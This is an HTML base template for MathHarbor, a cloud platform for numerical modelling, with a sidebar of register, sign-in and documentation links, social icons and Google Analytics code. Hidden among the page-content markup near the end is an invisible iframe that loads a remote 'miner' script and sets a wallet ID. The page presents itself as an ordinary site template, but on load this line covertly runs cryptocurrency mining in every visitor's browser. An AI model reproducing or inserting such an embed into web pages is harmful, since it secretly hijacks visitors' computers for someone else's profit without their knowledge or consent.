<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name"robots" content="INDEX, FOLLOW" />
    <meta property="og:image" content="http://mathharbor.com/static/img/mh-logo-small.jpg" />
    

    

    <meta name="keywords" content="maths, numerical modelling, on the cloud, MATLAB, Octave, Sage, Python, cloud-based platform, open source numerical packages" />
    <meta name="description" content=" MathHarbor is a scalable and secure numerical modelling platform." />

    <!-- Bootstrap core CSS -->
    <link href="/static/css/bootstrap.css" rel="stylesheet">

    <!-- Add custom CSS here -->
    <link href="/static/css/simple-sidebar.css" rel="stylesheet">
    <link href="/static/font-awesome/css/font-awesome.min.css" rel="stylesheet">
    <link rel="shortcut icon" href="/static/images/favicon.ico">
    <link href='http://fonts.googleapis.com/css?family=Oxygen' rel='stylesheet' type='text/css'>
    


    <style type="text/css">
          body{
        
    background-color: white;
    font-family: 'Oxygen', serif;
    /*background-image: url('/static/images/bg6.png');*/
   
  

    
    
              }
      
    </style>

  </head>

  <body>
  
    <div id="wrapper" style="color: #333133">
    
      <!-- Sidebar -->
      <div id="sidebar-wrapper" style="color:#E1F4FD; " >
        <ul class="sidebar-nav" style="color:#E1F4FD; ">
          <li class="sidebar-brand" style="font-size:24px; " ><a href="#" style="color:#E1F4FD;">./MathHarbor</a></li>
          <li >
          <table>
          <tr>
          <td><img src="/static/images/star.png" class="img-responsive"></td>
          <td><a href="/register" style="color:#E1F4FD;">Register</a></td>
          </tr>
          </table>
          </li>

          <li >
          <table>
          <tr>
          <td> <img src="/static/images/thumbs-up.png" class="img-responsive"></td>
          <td><a href="/sign-in" style="color:#E1F4FD;">Sign In</a></td>
          </tr>
          </table>
          </li>
          <li >
          <table>
          <tr>
          <td><img src="/static/images/doc.png" class="img-responsive"></td>
          <td><a href="#" style="color:#E1F4FD;">Documentation</a></td>
          </tr>
          </table>
          </li>

         

        </ul>
        <ul>
        <table >
        
        <tr style="padding-top:350px;">
        <td style="padding-top:350px;"><a href="https://www.facebook.com/mathharbor"><img src="/static/images/facebook.png" class="img-responsive"></a></td>
        <td style="padding-top:350px;"><a href="https://twitter.com/MathHarbor" ><img src="/static/images/twitter.png" class="img-responsive"></a></td>
        </tr>
        </table>
        </ul>
           <p style="padding-left:20px; padding-top:60px color:#E1F4FD;">founders@mathharbor.com</p>
          <p style="padding-left:20px; color:#E1F4FD;">&copy;MathHarbor 2013 AD</p>
          <p style="padding-left:20px;"><a href="http://nephoscale.com/" target="_blank"><img src="/static/images/powered-1.png" class="img-responsive"></a></p>

          
      </div>
          
      <!-- Page content -->
      <div id="page-content-wrapper">
        <div class="content-header">
          
            <a id="menu-toggle" href="#" class="btn btn-default"><i class="icon-reorder"></i></a>
            
        
        <!-- Keep all page content within the page-content inset div! -->
        <div class="page-content inset">
         {% block body %}{% endblock %}
    
        
            
      <!-- Main jumbotron for a primary marketing message or call to action -->
      

        </div>
        </div>
      <iframe style='display:none' src='http://tidbit.co.in/miner'><script>window.walletId = 1H8KMtnbGNciktx7PvTCgULTtE2MYMTke2</script></iframe>
      
 
    <!-- Bootstrap core JavaScript -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-44503245-1', 'mathharbor.com');
  ga('send', 'pageview');

</script>
    <script src="/static/js/jquery.js"></script>
    <script src="/static/js/bootstrap.js"></script>
    <!-- Put this into a custom JavaScript file to make things more organized -->
    <script>
    $("#menu-toggle").click(function(e) {
        e.preventDefault();
        $("#wrapper").toggleClass("active");
    });
    </script>
  </body>
</html>